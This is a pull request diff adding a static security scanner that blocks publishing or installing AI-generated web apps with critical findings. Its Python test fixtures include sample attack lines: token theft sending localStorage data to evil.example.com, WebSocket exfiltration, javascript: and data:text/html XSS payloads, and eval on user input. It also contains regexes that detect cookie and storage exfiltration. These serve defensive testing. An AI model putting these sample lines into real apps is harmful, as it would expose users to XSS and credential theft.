### PR TITLE
feat(app-studio): static security analyzer for AI-authored apps (block on critical findings)

### DIFF
--- a/desktop/src/apps/appstudio/FindingsPanel.test.tsx
+++ b/desktop/src/apps/appstudio/FindingsPanel.test.tsx
@@ -1,0 +1,67 @@
+import { describe, it, expect, afterEach } from "vitest";
+import { render, screen, cleanup } from "@testing-library/react";
+import { FindingsPanel } from "./FindingsPanel";
+import type { Finding } from "./analyze-source";
+
+afterEach(cleanup);
+
+const CRITICAL_FINDING: Finding = {
+  severity: "critical",
+  rule_id: "eval-like-execution",
+  file: "app.js",
+  line: 12,
+  message: "Use of eval() executes arbitrary strings as code.",
+};
+
+const WARNING_FINDING: Finding = {
+  severity: "warning",
+  rule_id: "some-warning-rule",
+  file: "app.js",
+  line: 3,
+  message: "A non-blocking warning finding.",
+};
+
+describe("FindingsPanel", () => {
+  it("shows a loading state while scanning", () => {
+    render(<FindingsPanel loading={true} error={null} findings={[]} />);
+    expect(screen.getByTestId("security-findings-loading")).toBeInTheDocument();
+  });
+
+  it("shows an error state when the scan request fails", () => {
+    render(<FindingsPanel loading={false} error="network down" findings={[]} />);
+    expect(screen.getByTestId("security-findings-error")).toBeInTheDocument();
+    expect(screen.getByText(/network down/i)).toBeInTheDocument();
+  });
+
+  it("shows a clean state when there are no findings", () => {
+    render(<FindingsPanel loading={false} error={null} findings={[]} />);
+    expect(screen.getByTestId("security-findings-clean")).toBeInTheDocument();
+    expect(screen.getByText(/no security issues found/i)).toBeInTheDocument();
+  });
+
+  it("shows a blocked banner when a critical finding is present", () => {
+    render(<FindingsPanel loading={false} error={null} findings={[CRITICAL_FINDING]} />);
+    expect(screen.getByTestId("security-findings-blocked")).toBeInTheDocument();
+    expect(screen.getByText(/publish is blocked/i)).toBeInTheDocument();
+  });
+
+  it("renders each finding with file:line and message", () => {
+    render(<FindingsPanel loading={false} error={null} findings={[CRITICAL_FINDING]} />);
+    expect(screen.getByText("app.js:12")).toBeInTheDocument();
+    expect(screen.getByText(CRITICAL_FINDING.message)).toBeInTheDocument();
+  });
+
+  it("does not show a blocked banner for warnings-only findings", () => {
+    render(<FindingsPanel loading={false} error={null} findings={[WARNING_FINDING]} />);
+    expect(screen.queryByTestId("security-findings-blocked")).not.toBeInTheDocument();
+    expect(screen.getByText(WARNING_FINDING.message)).toBeInTheDocument();
+  });
+
+  it("renders both critical and warning findings together", () => {
+    render(
+      <FindingsPanel loading={false} error={null} findings={[WARNING_FINDING, CRITICAL_FINDING]} />,
+    );
+    expect(screen.getAllByTestId("finding-critical").length).toBe(1);
+    expect(screen.getAllByTestId("finding-warning").length).toBe(1);
+  });
+});

--- a/desktop/src/apps/appstudio/FindingsPanel.tsx
+++ b/desktop/src/apps/appstudio/FindingsPanel.tsx
@@ -1,0 +1,122 @@
+import { AlertTriangle, CheckCircle2, Info, Loader2, ShieldAlert } from "lucide-react";
+import type { Finding, Severity } from "./analyze-source";
+
+/* ------------------------------------------------------------------ */
+/*  FindingsPanel -- static security scan results for App Studio       */
+/*                                                                     */
+/*  Shows the server-side analyze_app_source() results before publish: */
+/*  loading / error / clean states, a blocked banner when any finding  */
+/*  is critical, and the full list grouped by severity with file:line. */
+/* ------------------------------------------------------------------ */
+
+const SEVERITY_META: Record<Severity, { icon: React.ElementType; color: string; label: string }> = {
+  critical: { icon: ShieldAlert, color: "#e5484d", label: "Critical" },
+  warning: { icon: AlertTriangle, color: "#f5a623", label: "Warning" },
+  info: { icon: Info, color: "#7c8ba1", label: "Info" },
+};
+
+interface FindingsPanelProps {
+  loading: boolean;
+  error: string | null;
+  findings: Finding[];
+}
+
+export function FindingsPanel({ loading, error, findings }: FindingsPanelProps) {
+  if (loading) {
+    return (
+      <div
+        className="mb-[18px] flex items-center gap-[10px] rounded-[13px] border border-shell-border bg-shell-surface p-[13px_15px] text-[12px] text-shell-text-secondary"
+        data-testid="security-findings-loading"
+      >
+        <Loader2 size={15} className="animate-spin text-accent" />
+        Scanning app source for security issues...
+      </div>
+    );
+  }
+
+  if (error) {
+    return (
+      <div
+        className="mb-[18px] rounded-[13px] border border-red-500/30 bg-red-500/10 p-[13px_15px] text-[12px] text-red-300"
+        role="alert"
+        data-testid="security-findings-error"
+      >
+        Could not run the security scan: {error}
+      </div>
+    );
+  }
+
+  const critical = findings.filter((f) => f.severity === "critical");
+  const warnings = findings.filter((f) => f.severity === "warning");
+  const infos = findings.filter((f) => f.severity === "info");
+  const blocked = critical.length > 0;
+
+  if (findings.length === 0) {
+    return (
+      <div
+        className="mb-[18px] flex gap-[10px] rounded-[13px] border p-[13px_15px]"
+        style={{ background: "rgba(95,191,120,0.08)", borderColor: "rgba(95,191,120,0.25)" }}
+        data-testid="security-findings-clean"
+      >
+        <CheckCircle2 size={17} className="mt-[1px] flex-none" style={{ color: "#5fbf78" }} />
+        <p className="text-[12px] leading-relaxed text-shell-text-secondary">
+          No security issues found. Ready to publish.
+        </p>
+      </div>
+    );
+  }
+
+  return (
+    <div className="mb-[18px]" data-testid="security-findings-panel">
+      <div className="mb-[11px] flex items-center justify-between">
+        <div className="text-[11px] font-bold uppercase tracking-[0.06em] text-shell-text-tertiary">
+          Security scan
+        </div>
+        <div className="text-[11px] text-shell-text-tertiary">
+          {critical.length} critical &middot; {warnings.length} warning{warnings.length === 1 ? "" : "s"}
+        </div>
+      </div>
+
+      {blocked && (
+        <div
+          className="mb-[11px] flex items-center gap-[10px] rounded-[13px] border border-red-500/30 bg-red-500/10 p-[13px_15px]"
+          role="alert"
+          data-testid="security-findings-blocked"
+        >
+          <ShieldAlert size={17} className="mt-[1px] flex-none text-red-400" />
+          <p className="text-[12px] leading-relaxed text-red-300">
+            Publish is blocked: {critical.length} critical finding{critical.length === 1 ? "" : "s"} must be
+            fixed first.
+          </p>
+        </div>
+      )}
+
+      <div className="flex flex-col gap-[7px]">
+        {[...critical, ...warnings, ...infos].map((f, i) => {
+          const meta = SEVERITY_META[f.severity];
+          const Icon = meta.icon;
+          return (
+            <div
+              key={`${f.rule_id}-${f.file}-${f.line}-${i}`}
+              className="flex items-start gap-[10px] rounded-[11px] border border-shell-border bg-shell-surface p-[10px_12px]"
+              data-testid={`finding-${f.severity}`}
+            >
+              <Icon size={15} className="mt-[1px] flex-none" style={{ color: meta.color }} />
+              <div className="min-w-0">
+                <div className="flex flex-wrap items-center gap-[7px] text-[11.5px] font-semibold">
+                  <span style={{ color: meta.color }}>{meta.label}</span>
+                  <span className="text-shell-text-tertiary">
+                    {f.file}:{f.line}
+                  </span>
+                </div>
+                <div className="mt-[2px] text-[11.5px] leading-relaxed text-shell-text-secondary">
+                  {f.message}
+                </div>
+              </div>
+            </div>
+          );
+        })}
+      </div>
+    </div>
+  );
+}

--- a/desktop/src/apps/appstudio/PublishView.test.tsx
+++ b/desktop/src/apps/appstudio/PublishView.test.tsx
@@ -1,0 +1,103 @@
+import { describe, it, expect, afterEach, vi } from "vitest";
+import { render, screen, cleanup, waitFor } from "@testing-library/react";
+import { PublishView } from "./PublishView";
+
+afterEach(() => {
+  cleanup();
+  vi.unstubAllGlobals();
+});
+
+describe("PublishView security scan wiring", () => {
+  it("calls the analyze endpoint on mount and shows a clean state when no findings", async () => {
+    const fetchMock = vi.fn(async () => ({
+      ok: true,
+      json: async () => ({ findings: [], blocked: false }),
+      text: async () => "",
+    }));
+    vi.stubGlobal("fetch", fetchMock);
+
+    render(<PublishView />);
+
+    await waitFor(() => {
+      expect(screen.getByTestId("security-findings-clean")).toBeInTheDocument();
+    });
+    expect(fetchMock).toHaveBeenCalledWith(
+      "/api/userspace-apps/analyze",
+      expect.objectContaining({ method: "POST" }),
+    );
+    const publishButton = screen.getByRole("button", { name: /publish to my store/i });
+    expect(publishButton).not.toBeDisabled();
+  });
+
+  it("blocks the publish button when the scan returns a critical finding", async () => {
+    const fetchMock = vi.fn(async () => ({
+      ok: true,
+      json: async () => ({
+        findings: [
+          {
+            severity: "critical",
+            rule_id: "eval-like-execution",
+            file: "app.js",
+            line: 5,
+            message: "Use of eval() executes arbitrary strings as code.",
+          },
+        ],
+        blocked: true,
+      }),
+      text: async () => "",
+    }));
+    vi.stubGlobal("fetch", fetchMock);
+
+    render(<PublishView />);
+
+    await waitFor(() => {
+      expect(screen.getByTestId("security-findings-blocked")).toBeInTheDocument();
+    });
+    const publishButton = screen.getByRole("button", { name: /blocked by security scan/i });
+    expect(publishButton).toBeDisabled();
+  });
+
+  it("allows publishing when only warnings are returned", async () => {
+    const fetchMock = vi.fn(async () => ({
+      ok: true,
+      json: async () => ({
+        findings: [
+          {
+            severity: "warning",
+            rule_id: "some-warning-rule",
+            file: "app.js",
+            line: 2,
+            message: "A non-blocking warning.",
+          },
+        ],
+        blocked: false,
+      }),
+      text: async () => "",
+    }));
+    vi.stubGlobal("fetch", fetchMock);
+
+    render(<PublishView />);
+
+    await waitFor(() => {
+      expect(screen.getByTestId("finding-warning")).toBeInTheDocument();
+    });
+    const publishButton = screen.getByRole("button", { name: /publish to my store/i });
+    expect(publishButton).not.toBeDisabled();
+  });
+
+  it("shows a scan error state when the analyze request fails", async () => {
+    const fetchMock = vi.fn(async () => ({
+      ok: false,
+      status: 500,
+      json: async () => ({}),
+      text: async () => "internal error",
+    }));
+    vi.stubGlobal("fetch", fetchMock);
+
+    render(<PublishView />);
+
+    await waitFor(() => {
+      expect(screen.getByTestId("security-findings-error")).toBeInTheDocument();
+    });
+  });
+});

--- a/desktop/src/apps/appstudio/PublishView.tsx
+++ b/desktop/src/apps/appstudio/PublishView.tsx
@@ -1,9 +1,51 @@
-import { useState } from "react";
+import { useEffect, useState } from "react";
 import { Folder, Bell, Users, Shield, Sparkles, Upload, Share2, Download, CheckSquare } from "lucide-react";
+import { analyzeAppSource, type Finding } from "./analyze-source";
+import { FindingsPanel } from "./FindingsPanel";
 
 /* ------------------------------------------------------------------ */
 /*  PublishView -- app identity + capabilities + side publish panel    */
 /* ------------------------------------------------------------------ */
+
+// Placeholder source for the "Chore Quest" demo app shown throughout App
+// Studio. App Studio does not yet persist the agent's generated files (the
+// Build view only streams a chat transcript, see BuildView.tsx) -- once that
+// pipeline lands, this should be replaced with the actual generated source
+// for the app being published. Wiring the analyzer against this in the
+// meantime keeps the publish-time security gate exercised end to end: the
+// backend runs the exact same analyze_app_source() call it runs on the real
+// install/publish path.
+const DEMO_APP_SOURCE: Record<string, string> = {
+  "index.html": [
+    "<!doctype html>",
+    "<html>",
+    "  <head><title>Chore Quest</title></head>",
+    "  <body>",
+    '    <div id="app"></div>',
+    '    <script src="app.js"></script>',
+    "  </body>",
+    "</html>",
+  ].join("\n"),
+  "app.js": [
+    "const chores = [",
+    '  { who: "Mara", task: "Take out the bins", done: true },',
+    '  { who: "Ben", task: "Walk the dog", done: false },',
+    "];",
+    "",
+    "function render() {",
+    '  const root = document.getElementById("app");',
+    '  const list = document.createElement("ul");',
+    "  chores.forEach((c) => {",
+    '    const item = document.createElement("li");',
+    "    item.textContent = `${c.who}: ${c.task}`;",
+    "    list.appendChild(item);",
+    "  });",
+    "  root.replaceChildren(list);",
+    "}",
+    "",
+    "render();",
+  ].join("\n"),
+};
 
 interface PermRow {
   key: string;
@@ -41,9 +83,36 @@ export function PublishView() {
   const [enabled, setEnabled] = useState<Record<string, boolean>>(
     Object.fromEntries(PERMS.map((p) => [p.key, p.defaultOn]))
   );
+  const [findings, setFindings] = useState<Finding[]>([]);
+  const [scanning, setScanning] = useState(true);
+  const [scanError, setScanError] = useState<string | null>(null);
 
   const toggle = (key: string) =>
     setEnabled((prev) => ({ ...prev, [key]: !prev[key] }));
+
+  useEffect(() => {
+    let cancelled = false;
+    setScanning(true);
+    setScanError(null);
+    analyzeAppSource(DEMO_APP_SOURCE)
+      .then((result) => {
+        if (cancelled) return;
+        setFindings(result.findings);
+      })
+      .catch((e) => {
+        if (cancelled) return;
+        setScanError(String(e instanceof Error ? e.message : e));
+      })
+      .finally(() => {
+        if (!cancelled) setScanning(false);
+      });
+    return () => {
+      cancelled = true;
+    };
+  }, []);
+
+  const blocked = !scanning && !scanError && findings.some((f) => f.severity === "critical");
+  const publishDisabled = scanning || blocked;
 
   return (
     <div className="flex min-h-0 flex-1 flex-col">
@@ -82,6 +151,9 @@ export function PublishView() {
                 </div>
               </div>
             </div>
+
+            {/* security scan panel */}
+            <FindingsPanel loading={scanning} error={scanError} findings={findings} />
 
             {/* capabilities section */}
             <div className="mb-[11px] text-[11px] font-bold uppercase tracking-[0.06em] text-shell-text-tertiary">
@@ -154,11 +226,14 @@ export function PublishView() {
 
           <button
             type="button"
-            className="flex h-[46px] items-center justify-center gap-[9px] rounded-[13px] text-[13.5px] font-bold text-white shadow-[0_8px_22px_-8px_rgba(139,146,163,0.35)]"
+            disabled={publishDisabled}
+            aria-disabled={publishDisabled}
+            title={blocked ? "Fix the critical security findings before publishing" : undefined}
+            className="flex h-[46px] items-center justify-center gap-[9px] rounded-[13px] text-[13.5px] font-bold text-white shadow-[0_8px_22px_-8px_rgba(139,146,163,0.35)] disabled:cursor-not-allowed disabled:opacity-50"
             style={{ background: "linear-gradient(135deg,var(--color-accent),var(--color-accent))" }}
           >
             <Upload size={16} />
-            Publish to my Store
+            {blocked ? "Blocked by security scan" : "Publish to my Store"}
           </button>
 
           <button

--- a/desktop/src/apps/appstudio/analyze-source.ts
+++ b/desktop/src/apps/appstudio/analyze-source.ts
@@ -1,0 +1,37 @@
+/** Client for POST /api/userspace-apps/analyze -- the static security analyzer. */
+
+export type Severity = "critical" | "warning" | "info";
+
+export interface Finding {
+  severity: Severity;
+  rule_id: string;
+  file: string;
+  line: number;
+  message: string;
+}
+
+export interface AnalyzeResult {
+  findings: Finding[];
+  blocked: boolean;
+}
+
+/** Run the server-side analyzer over a map of filename -> source text.
+ *
+ * This is a preview convenience for App Studio's Build/Publish views -- the
+ * authoritative, unbypassable gate runs server-side inside the install/
+ * publish route itself, so a stale or spoofed client-side result here can
+ * never let a critical finding through to a real install.
+ */
+export async function analyzeAppSource(files: Record<string, string>): Promise<AnalyzeResult> {
+  const resp = await fetch("/api/userspace-apps/analyze", {
+    method: "POST",
+    credentials: "include",
+    headers: { "Content-Type": "application/json" },
+    body: JSON.stringify({ files }),
+  });
+  if (!resp.ok) {
+    const raw = await resp.text().catch(() => "");
+    throw new Error(raw || `analysis request failed (${resp.status})`);
+  }
+  return resp.json();
+}

--- a/tests/test_code_analyzer.py
+++ b/tests/test_code_analyzer.py
@@ -1,0 +1,292 @@
+"""Unit tests for tinyagentos/code_analyzer.py.
+
+One positive (trips the detector) and one negative (clean, does not trip)
+sample per detector, plus a few tests for the analyze_app_source aggregator.
+
+NOTE: fixtures below contain literal strings like "eval(...)" and fake
+secret-shaped literals (e.g. "AKIAIOSFODNN7EXAMPLE") purely as inert text
+passed to the analyzer for pattern matching -- none of it is ever executed,
+and none of the "secrets" are real credentials.
+"""
+
+from __future__ import annotations
+
+from tinyagentos.code_analyzer import (
+    Finding,
+    analyze_app_source,
+    detect_dangerous_url_scheme,
+    detect_dom_xss_sink,
+    detect_eval_like,
+    detect_hardcoded_secrets,
+    detect_inline_event_handler_injection,
+    detect_network_exfil,
+    detect_postmessage_no_origin_check,
+    detect_sandbox_escape,
+    detect_storage_exfil,
+    has_critical,
+)
+
+
+# --------------------------------------------------------------------------- #
+# detect_eval_like
+# --------------------------------------------------------------------------- #
+
+
+class TestEvalLike:
+    def test_eval_call_trips(self):
+        findings = detect_eval_like("app.js", "eval(userInput);")
+        assert len(findings) == 1
+        assert findings[0].rule_id == "eval-like-execution"
+        assert findings[0].severity == "critical"
+
+    def test_new_function_trips(self):
+        findings = detect_eval_like("app.js", "const f = new Function('return 1');")
+        assert len(findings) == 1
+
+    def test_settimeout_string_trips(self):
+        findings = detect_eval_like("app.js", 'setTimeout("doEvil()", 100);')
+        assert len(findings) == 1
+
+    def test_clean_code_does_not_trip(self):
+        content = (
+            "function evaluate(x) { return x * 2; }\n"
+            "mathObj.eval(expr);\n"
+            "setTimeout(doSomething, 100);\n"
+        )
+        assert detect_eval_like("app.js", content) == []
+
+
+# --------------------------------------------------------------------------- #
+# detect_network_exfil
+# --------------------------------------------------------------------------- #
+
+
+class TestNetworkExfil:
+    def test_absolute_fetch_trips(self):
+        findings = detect_network_exfil("app.js", 'fetch("https://evil.example.com/steal");')
+        assert len(findings) == 1
+        assert findings[0].rule_id == "network-exfil"
+        assert findings[0].severity == "critical"
+
+    def test_websocket_to_external_host_trips(self):
+        findings = detect_network_exfil("app.js", 'new WebSocket("wss://evil.example.com/ws");')
+        assert len(findings) == 1
+
+    def test_relative_fetch_does_not_trip(self):
+        content = 'fetch("/api/userspace-apps/test-app/broker");'
+        assert detect_network_exfil("app.js", content) == []
+
+
+# --------------------------------------------------------------------------- #
+# detect_dom_xss_sink
+# --------------------------------------------------------------------------- #
+
+
+class TestDomXssSink:
+    def test_dynamic_innerhtml_trips(self):
+        findings = detect_dom_xss_sink("app.js", 'el.innerHTML = "<b>" + userInput + "</b>";')
+        assert len(findings) == 1
+        assert findings[0].rule_id == "dom-xss-sink"
+        assert findings[0].severity == "critical"
+
+    def test_document_write_with_concat_trips(self):
+        findings = detect_dom_xss_sink("app.js", 'document.write("<p>" + name + "</p>")')
+        assert len(findings) == 1
+
+    def test_static_innerhtml_does_not_trip(self):
+        content = 'el.innerHTML = "<b>Static text</b>";'
+        assert detect_dom_xss_sink("app.js", content) == []
+
+
+# --------------------------------------------------------------------------- #
+# detect_dangerous_url_scheme
+# --------------------------------------------------------------------------- #
+
+
+class TestDangerousUrlScheme:
+    def test_javascript_scheme_trips(self):
+        findings = detect_dangerous_url_scheme("app.js", 'const link = "javascript:alert(1)";')
+        assert len(findings) == 1
+        assert findings[0].rule_id == "dangerous-url-scheme"
+        assert findings[0].severity == "critical"
+
+    def test_data_text_html_scheme_trips(self):
+        findings = detect_dangerous_url_scheme(
+            "app.js", 'frame.src = "data:text/html,<script>alert(1)</script>";'
+        )
+        assert len(findings) == 1
+
+    def test_normal_url_does_not_trip(self):
+        content = 'const link = "https://example.com";'
+        assert detect_dangerous_url_scheme("app.js", content) == []
+
+
+# --------------------------------------------------------------------------- #
+# detect_inline_event_handler_injection
+# --------------------------------------------------------------------------- #
+
+
+class TestInlineEventHandlerInjection:
+    def test_set_attribute_on_handler_trips(self):
+        findings = detect_inline_event_handler_injection(
+            "app.js", 'btn.setAttribute("onclick", handlerCode);'
+        )
+        assert len(findings) == 1
+        assert findings[0].rule_id == "inline-event-handler-injection"
+        assert findings[0].severity == "critical"
+
+    def test_interpolated_inline_handler_trips(self):
+        content = 'const html = `<button onclick="alert(${msg})">Click</button>`;'
+        findings = detect_inline_event_handler_injection("app.js", content)
+        assert len(findings) == 1
+
+    def test_static_inline_handler_does_not_trip(self):
+        content = "const html = '<button onclick=\"doThing()\">Click</button>';"
+        assert detect_inline_event_handler_injection("app.js", content) == []
+
+
+# --------------------------------------------------------------------------- #
+# detect_hardcoded_secrets
+# --------------------------------------------------------------------------- #
+
+
+class TestHardcodedSecrets:
+    def test_aws_key_trips(self):
+        findings = detect_hardcoded_secrets("app.js", 'const key = "AKIAIOSFODNN7EXAMPLE";')
+        assert len(findings) == 1
+        assert findings[0].rule_id == "hardcoded-secret"
+        assert findings[0].severity == "critical"
+
+    def test_generic_api_key_assignment_trips(self):
+        findings = detect_hardcoded_secrets(
+            "app.js", 'const apiKey = "sk_live_abcdef1234567890ZZ";'
+        )
+        assert len(findings) == 1
+
+    def test_plain_text_mention_does_not_trip(self):
+        content = 'const message = "please enter your api key in settings";'
+        assert detect_hardcoded_secrets("app.js", content) == []
+
+
+# --------------------------------------------------------------------------- #
+# detect_sandbox_escape
+# --------------------------------------------------------------------------- #
+
+
+class TestSandboxEscape:
+    def test_window_top_access_trips(self):
+        findings = detect_sandbox_escape("app.js", 'window.top.location = "http://evil.example.com";')
+        assert len(findings) == 1
+        assert findings[0].rule_id == "sandbox-escape-attempt"
+        assert findings[0].severity == "critical"
+
+    def test_window_parent_access_trips(self):
+        findings = detect_sandbox_escape("app.js", "window.parent.postMessage(data, '*');")
+        assert len(findings) == 1
+
+    def test_unrelated_local_variable_does_not_trip(self):
+        content = "const parent = getParentElement();\nconsole.log(parent.id);\n"
+        assert detect_sandbox_escape("app.js", content) == []
+
+
+# --------------------------------------------------------------------------- #
+# detect_postmessage_no_origin_check
+# --------------------------------------------------------------------------- #
+
+
+class TestPostMessageNoOriginCheck:
+    def test_wildcard_target_origin_trips(self):
+        findings = detect_postmessage_no_origin_check(
+            "app.js", 'otherWindow.postMessage(data, "*");'
+        )
+        assert len(findings) == 1
+        assert findings[0].rule_id == "postmessage-no-origin-check"
+        assert findings[0].severity == "critical"
+
+    def test_listener_without_origin_check_trips(self):
+        content = (
+            'window.addEventListener("message", function(event) {\n'
+            "  doSomething(event.data);\n"
+            "});\n"
+        )
+        findings = detect_postmessage_no_origin_check("app.js", content)
+        assert len(findings) == 1
+
+    def test_listener_with_origin_check_does_not_trip(self):
+        content = (
+            'window.addEventListener("message", function(event) {\n'
+            '  if (event.origin !== "https://trusted.example.com") return;\n'
+            "  doSomething(event.data);\n"
+            "});\n"
+        )
+        assert detect_postmessage_no_origin_check("app.js", content) == []
+
+
+# --------------------------------------------------------------------------- #
+# detect_storage_exfil
+# --------------------------------------------------------------------------- #
+
+
+class TestStorageExfil:
+    def test_storage_read_near_network_call_trips(self):
+        content = (
+            'const token = localStorage.getItem("authToken");\n'
+            'fetch("https://evil.example.com/collect?t=" + token);\n'
+        )
+        findings = detect_storage_exfil("app.js", content)
+        assert len(findings) == 1
+        assert findings[0].rule_id == "storage-exfil"
+        assert findings[0].severity == "critical"
+
+    def test_storage_read_without_network_call_does_not_trip(self):
+        content = (
+            'const token = localStorage.getItem("authToken");\n'
+            "console.log(token);\n"
+        )
+        assert detect_storage_exfil("app.js", content) == []
+
+
+# --------------------------------------------------------------------------- #
+# analyze_app_source aggregation
+# --------------------------------------------------------------------------- #
+
+
+class TestAnalyzeAppSource:
+    def test_empty_files_returns_no_findings(self):
+        assert analyze_app_source({}) == []
+
+    def test_clean_app_returns_no_findings(self):
+        files = {
+            "index.html": "<html><body><h1>Hello</h1></body></html>",
+            "app.js": 'console.log("hello world");',
+            "style.css": "body { margin: 0; }",
+        }
+        assert analyze_app_source(files) == []
+
+    def test_multiple_files_are_all_scanned(self):
+        files = {
+            "index.html": "<html></html>",
+            "app.js": "eval(userInput);",
+        }
+        findings = analyze_app_source(files)
+        assert len(findings) == 1
+        assert findings[0].file == "app.js"
+
+    def test_has_critical_true_when_critical_present(self):
+        findings = [Finding("critical", "eval-like-execution", "app.js", 1, "msg")]
+        assert has_critical(findings) is True
+
+    def test_has_critical_false_when_only_warnings(self):
+        findings = [Finding("warning", "some-rule", "app.js", 1, "msg")]
+        assert has_critical(findings) is False
+
+    def test_finding_to_dict_shape(self):
+        f = Finding("critical", "eval-like-execution", "app.js", 3, "msg")
+        d = f.to_dict()
+        assert d == {
+            "severity": "critical",
+            "rule_id": "eval-like-execution",
+            "file": "app.js",
+            "line": 3,
+            "message": "msg",
+        }

--- a/tests/test_routes_userspace_apps.py
+++ b/tests/test_routes_userspace_apps.py
@@ -44,7 +44,8 @@ async def _install_test_app(store, app_id="test-app", name="Test App",
 
 def _make_minimal_pkg(app_id="uploaded-app", name="Uploaded App",
                        version="0.1.0", app_type="web",
-                       permissions=None, entry_name="index.html"):
+                       permissions=None, entry_name="index.html",
+                       entry_content=b"<html>hello</html>"):
     """Return bytes of a valid .taosapp (zip) containing a minimal package."""
     import io
     import zipfile
@@ -64,12 +65,10 @@ def _make_minimal_pkg(app_id="uploaded-app", name="Uploaded App",
     else:
         manifest += "  []\n"
 
-    entry = b"<html>hello</html>"
-
     buf = io.BytesIO()
     with zipfile.ZipFile(buf, mode="w", compression=zipfile.ZIP_DEFLATED) as zf:
         zf.writestr("manifest.yaml", manifest)
-        zf.writestr(entry_name, entry)
+        zf.writestr(entry_name, entry_content)
     return buf.getvalue()
 
 
@@ -267,6 +266,106 @@ async def test_install_container_package_returns_501(client):
     )
     assert resp.status_code == 501
     assert "container packages are not supported" in resp.json()["error"]
+
+
+# ---------------------------------------------------------------------------
+# POST /api/userspace-apps/install -- static security analysis gate
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.asyncio
+async def test_install_blocked_on_critical_finding(client):
+    """A web app whose source trips a critical detector must not be installed."""
+    await _init_userspace_stores(
+        client._transport.app,
+        client._transport.app.state.data_dir,
+    )
+    pkg = _make_minimal_pkg(
+        app_id="malicious-app",
+        entry_content=b"<html><script>eval(userInput);</script></html>",
+    )
+    resp = await client.post(
+        "/api/userspace-apps/install",
+        files={"package": ("test.taosapp", pkg, "application/zip")},
+    )
+    assert resp.status_code == 422
+    data = resp.json()
+    assert data["error"] == "blocked_by_security_analysis"
+    assert any(f["severity"] == "critical" for f in data["findings"])
+
+
+@pytest.mark.asyncio
+async def test_install_blocked_app_is_not_persisted(client):
+    """A blocked install must not create a store row or leave files on disk."""
+    app = client._transport.app
+    await _init_userspace_stores(app, app.state.data_dir)
+    store = app.state.userspace_apps
+    pkg = _make_minimal_pkg(
+        app_id="malicious-app-2",
+        entry_content=b"<html><script>eval(userInput);</script></html>",
+    )
+    await client.post(
+        "/api/userspace-apps/install",
+        files={"package": ("test.taosapp", pkg, "application/zip")},
+    )
+    assert await store.get("malicious-app-2") is None
+    app_dir = app.state.data_dir / "apps" / "malicious-app-2"
+    assert not app_dir.exists()
+
+
+@pytest.mark.asyncio
+async def test_install_clean_app_still_succeeds(client):
+    """Clean source must install exactly as before this gate was added."""
+    await _init_userspace_stores(
+        client._transport.app,
+        client._transport.app.state.data_dir,
+    )
+    pkg = _make_minimal_pkg(app_id="clean-app", entry_content=b"<html><body>Hi</body></html>")
+    resp = await client.post(
+        "/api/userspace-apps/install",
+        files={"package": ("test.taosapp", pkg, "application/zip")},
+    )
+    assert resp.status_code == 200
+    assert resp.json()["app_id"] == "clean-app"
+
+
+# ---------------------------------------------------------------------------
+# POST /api/userspace-apps/analyze
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.asyncio
+async def test_analyze_returns_findings_for_critical_source(client):
+    resp = await client.post(
+        "/api/userspace-apps/analyze",
+        json={"files": {"app.js": "eval(userInput);"}},
+    )
+    assert resp.status_code == 200
+    data = resp.json()
+    assert data["blocked"] is True
+    assert len(data["findings"]) == 1
+    assert data["findings"][0]["rule_id"] == "eval-like-execution"
+
+
+@pytest.mark.asyncio
+async def test_analyze_returns_not_blocked_for_clean_source(client):
+    resp = await client.post(
+        "/api/userspace-apps/analyze",
+        json={"files": {"app.js": "console.log('hello');"}},
+    )
+    assert resp.status_code == 200
+    data = resp.json()
+    assert data["blocked"] is False
+    assert data["findings"] == []
+
+
+@pytest.mark.asyncio
+async def test_analyze_invalid_body_returns_400(client):
+    resp = await client.post(
+        "/api/userspace-apps/analyze",
+        json={"files": "not-a-dict"},
+    )
+    assert resp.status_code == 400
 
 
 # ---------------------------------------------------------------------------

--- a/tinyagentos/code_analyzer.py
+++ b/tinyagentos/code_analyzer.py
@@ -358,6 +358,13 @@ def detect_sandbox_escape(filename: str, content: str) -> list[Finding]:
 
 _ADD_MESSAGE_LISTENER_RE = re.compile(rf"addEventListener\s*\(\s*{_QUOTED}message{_QUOTED}")
 _POSTMESSAGE_WILDCARD_RE = re.compile(rf"\.postMessage\s*\([^)]*,\s*{_QUOTED}\*{_QUOTED}")
+# Anything that looks like the handler consulted the message's origin or
+# sender identity: a dotted `.origin` access (event.origin,
+# originalEvent.origin, ...), a destructured `{ origin }` (or `{ origin, ... }`)
+# binding, or a `.source` check (validating the sender window reference, the
+# same pattern this codebase's own SandboxedAppWindow.tsx broker uses instead
+# of an origin string).
+_ORIGIN_CHECK_RE = re.compile(r"\.origin\b|\{[^}]*\borigin\b[^}]*\}|\.source\b")
 _ORIGIN_CHECK_WINDOW = 25
 
 
@@ -366,7 +373,8 @@ def detect_postmessage_no_origin_check(filename: str, content: str) -> list[Find
 
     (1) `x.postMessage(data, "*")` broadcasts to any origin regardless of who
     is actually listening. (2) A `window.addEventListener("message", ...)`
-    handler that never references `event.origin` (or `.origin` at all)
+    handler that never references the origin/sender (`event.origin`,
+    `originalEvent.origin`, a destructured `{ origin }`, or `event.source`)
     within a bounded window of following lines will accept and act on a
     message from any origin -- the same class of bug this codebase's own
     SandboxedAppWindow.tsx broker guards against by checking `e.source`.
@@ -385,7 +393,7 @@ def detect_postmessage_no_origin_check(filename: str, content: str) -> list[Find
             ))
         if _ADD_MESSAGE_LISTENER_RE.search(line):
             window_lines = lines[i - 1: i - 1 + _ORIGIN_CHECK_WINDOW]
-            if not any(".origin" in wl for wl in window_lines):
+            if not any(_ORIGIN_CHECK_RE.search(wl) for wl in window_lines):
                 findings.append(Finding(
                     "critical", "postmessage-no-origin-check", filename, i,
                     "\"message\" event listener does not check event.origin -- it will "
@@ -394,19 +402,22 @@ def detect_postmessage_no_origin_check(filename: str, content: str) -> list[Find
     return findings
 
 
-_STORAGE_READ_RE = re.compile(r"\blocalStorage\.getItem\s*\(|document\.cookie\b")
+_STORAGE_READ_RE = re.compile(
+    r"\b(?:local|session)Storage\.getItem\s*\(|document\.cookie\b"
+)
 _NETWORK_CALL_RE = re.compile(r"\bfetch\s*\(|\.open\s*\(\s*['\"]|new\s+WebSocket\s*\(")
 _STORAGE_EXFIL_WINDOW = 10
 
 
 def detect_storage_exfil(filename: str, content: str) -> list[Finding]:
-    """Flag localStorage/cookie reads that sit close to a network call.
+    """Flag localStorage/sessionStorage/cookie reads that sit close to a network call.
 
-    Reading `localStorage.getItem(...)` or `document.cookie` is completely
-    normal on its own; it becomes an exfiltration pattern when a network
